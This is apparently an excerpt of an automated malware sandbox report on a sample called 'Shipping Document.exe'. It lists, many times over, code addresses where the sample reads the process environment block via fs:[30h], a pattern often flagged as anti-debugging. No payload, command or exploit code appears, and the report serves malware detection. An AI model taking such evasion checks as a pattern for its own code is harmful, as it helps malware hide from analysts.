                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F80A0 mov eax, dword ptr fs:[00000030h]10_2_010F80A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011980A8 mov eax, dword ptr fs:[00000030h]10_2_011980A8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011820DE mov eax, dword ptr fs:[00000030h]10_2_011820DE
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011420F0 mov ecx, dword ptr fs:[00000030h]10_2_011420F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA0E3 mov ecx, dword ptr fs:[00000030h]10_2_010FA0E3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011860E0 mov eax, dword ptr fs:[00000030h]10_2_011860E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011080E9 mov eax, dword ptr fs:[00000030h]10_2_011080E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC0F0 mov eax, dword ptr fs:[00000030h]10_2_010FC0F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01120310 mov ecx, dword ptr fs:[00000030h]10_2_01120310
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A30B mov eax, dword ptr fs:[00000030h]10_2_0113A30B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC310 mov ecx, dword ptr fs:[00000030h]10_2_010FC310
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov ecx, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D8324 mov eax, dword ptr fs:[00000030h]10_2_011D8324
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov ecx, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118035C mov eax, dword ptr fs:[00000030h]10_2_0118035C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A8350 mov ecx, dword ptr fs:[00000030h]10_2_011A8350
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011CA352 mov eax, dword ptr fs:[00000030h]10_2_011CA352
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D634F mov eax, dword ptr fs:[00000030h]10_2_011D634F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A437C mov eax, dword ptr fs:[00000030h]10_2_011A437C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112438F mov eax, dword ptr fs:[00000030h]10_2_0112438F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112438F mov eax, dword ptr fs:[00000030h]10_2_0112438F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov ecx, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A43D4 mov eax, dword ptr fs:[00000030h]10_2_011A43D4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A43D4 mov eax, dword ptr fs:[00000030h]10_2_011A43D4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BC3CD mov eax, dword ptr fs:[00000030h]10_2_011BC3CD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011863C0 mov eax, dword ptr fs:[00000030h]10_2_011863C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011363FF mov eax, dword ptr fs:[00000030h]10_2_011363FF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F823B mov eax, dword ptr fs:[00000030h]10_2_010F823B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D625D mov eax, dword ptr fs:[00000030h]10_2_011D625D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106259 mov eax, dword ptr fs:[00000030h]10_2_01106259
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA250 mov eax, dword ptr fs:[00000030h]10_2_011BA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA250 mov eax, dword ptr fs:[00000030h]10_2_011BA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01188243 mov eax, dword ptr fs:[00000030h]10_2_01188243
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01188243 mov ecx, dword ptr fs:[00000030h]10_2_01188243
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA250 mov eax, dword ptr fs:[00000030h]10_2_010FA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F826B mov eax, dword ptr fs:[00000030h]10_2_010F826B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E284 mov eax, dword ptr fs:[00000030h]10_2_0113E284
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E284 mov eax, dword ptr fs:[00000030h]10_2_0113E284
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102A0 mov eax, dword ptr fs:[00000030h]10_2_011102A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102A0 mov eax, dword ptr fs:[00000030h]10_2_011102A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov ecx, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D62D6 mov eax, dword ptr fs:[00000030h]10_2_011D62D6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196500 mov eax, dword ptr fs:[00000030h]10_2_01196500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108550 mov eax, dword ptr fs:[00000030h]10_2_01108550
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108550 mov eax, dword ptr fs:[00000030h]10_2_01108550
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E59C mov eax, dword ptr fs:[00000030h]10_2_0113E59C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102582 mov eax, dword ptr fs:[00000030h]10_2_01102582
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102582 mov ecx, dword ptr fs:[00000030h]10_2_01102582
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01134588 mov eax, dword ptr fs:[00000030h]10_2_01134588
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011245B1 mov eax, dword ptr fs:[00000030h]10_2_011245B1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011245B1 mov eax, dword ptr fs:[00000030h]10_2_011245B1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011065D0 mov eax, dword ptr fs:[00000030h]10_2_011065D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A5D0 mov eax, dword ptr fs:[00000030h]10_2_0113A5D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A5D0 mov eax, dword ptr fs:[00000030h]10_2_0113A5D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E5CF mov eax, dword ptr fs:[00000030h]10_2_0113E5CF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E5CF mov eax, dword ptr fs:[00000030h]10_2_0113E5CF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011025E0 mov eax, dword ptr fs:[00000030h]10_2_011025E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C5ED mov eax, dword ptr fs:[00000030h]10_2_0113C5ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C5ED mov eax, dword ptr fs:[00000030h]10_2_0113C5ED
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01138402 mov eax, dword ptr fs:[00000030h]10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01138402 mov eax, dword ptr fs:[00000030h]10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01138402 mov eax, dword ptr fs:[00000030h]10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A430 mov eax, dword ptr fs:[00000030h]10_2_0113A430
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FC427 mov eax, dword ptr fs:[00000030h]10_2_010FC427
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h]10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h]10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h]10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01186420 mov eax, dword ptr fs:[00000030h]10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112245A mov eax, dword ptr fs:[00000030h]10_2_0112245A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA456 mov eax, dword ptr fs:[00000030h]10_2_011BA456
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h]10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F645D mov eax, dword ptr fs:[00000030h]10_2_010F645D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h]10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h]10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h]10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118C460 mov ecx, dword ptr fs:[00000030h]10_2_0118C460
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA49A mov eax, dword ptr fs:[00000030h]10_2_011BA49A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011344B0 mov ecx, dword ptr fs:[00000030h]10_2_011344B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0118A4B0 mov eax, dword ptr fs:[00000030h]10_2_0118A4B0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011064AB mov eax, dword ptr fs:[00000030h]10_2_011064AB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011004E5 mov ecx, dword ptr fs:[00000030h]10_2_011004E5
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01100710 mov eax, dword ptr fs:[00000030h]10_2_01100710
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01130710 mov eax, dword ptr fs:[00000030h]10_2_01130710
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C700 mov eax, dword ptr fs:[00000030h]10_2_0113C700
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0117C730 mov eax, dword ptr fs:[00000030h]10_2_0117C730
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113273C mov eax, dword ptr fs:[00000030h]10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113273C mov ecx, dword ptr fs:[00000030h]10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113273C mov eax, dword ptr fs:[00000030h]10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C720 mov eax, dword ptr fs:[00000030h]10_2_0113C720
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113C720 mov eax, dword ptr fs:[00000030h]10_2_0113C720
